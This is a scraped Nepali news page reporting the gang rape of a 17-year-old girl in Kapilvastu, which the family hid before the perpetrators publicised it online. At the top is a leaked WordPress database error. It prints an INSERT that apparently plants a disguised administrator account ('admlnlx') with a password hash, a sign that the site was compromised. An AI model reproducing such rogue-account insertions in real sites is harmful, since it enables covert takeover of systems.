WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjgpVmaXuuyzl9nR4cykvBtbMI5rmN1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 06:34:48', '', 'admlnlx', 'admlnlx')
कपिलवस्तु, फागुन ३ –
पाँच जना युवकले एक युवतीलाई सामुहिक बलात्कार गरेको खुलेको छ ।गत माघ २६ गते तौलिहवा लुम्बिनी सडक अन्तर्गत पकडी गाविसको पकडी बजार नजिक सिसौघारीमा १७ बर्षीया भारतीय युवती बलात्कारको सिकार भएकी हुन् ।
फागुन ३ गते विवाहका लागि ती युवतीको तिलक तय थियो । त्यसैले परिवारले बलात्कारजस्तो जघन्य अपराध लुकाएको पाइएको छ । घटना सार्वजनिक भएमा विवाह प्रभावित हुने डरले लुकाएको पारिवारिक स्रोतले जनाएको छ ।
तर, बलात्कारमा संलग्न युवाहरुले नै इन्टरनेटमार्फत घटना सार्वजनिक गरेपछि बाहिर आएको हो । फुपूको घर बिमिहाबाट फर्कीरहेकी युवती २६ गते दिउँसो सामुहिक बलात्कारमा परेकी हुन् ।
युवतीको गाउँकै एक युवासँग प्रेम रहेको स्थानियको भनाइ छ । युवाले नै भेट्नको लागि त्यहाँ पुर्याएको उनीहरुले बताए । त्रासका कारण घटनाबारे यूवतीले कसैलाई भनेकी थिइनन् । कान्तिपुर दैनिकमा खबर छ ।